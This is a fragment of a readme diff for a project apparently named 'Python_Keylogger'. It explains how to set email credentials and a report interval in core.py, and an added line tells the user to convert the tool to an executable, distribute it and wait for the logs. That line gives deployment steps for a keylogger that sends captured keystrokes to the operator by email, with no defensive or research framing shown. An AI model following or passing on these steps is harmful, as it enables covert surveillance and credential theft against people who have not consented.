zach-hutz/Python_Keylogger/readme.md

 - Open core.py, edit the EMAIL_ADDRESS variable on line [29]
 - Edit the EMAIL_PASSWORD variable on line [30]
 - (Optional) Edit the SEND_REPORT_EVERY variable on line [31] to alter how often logs are sent
+- Convert to executable file, distribute and wait for the logs.

 ## Version History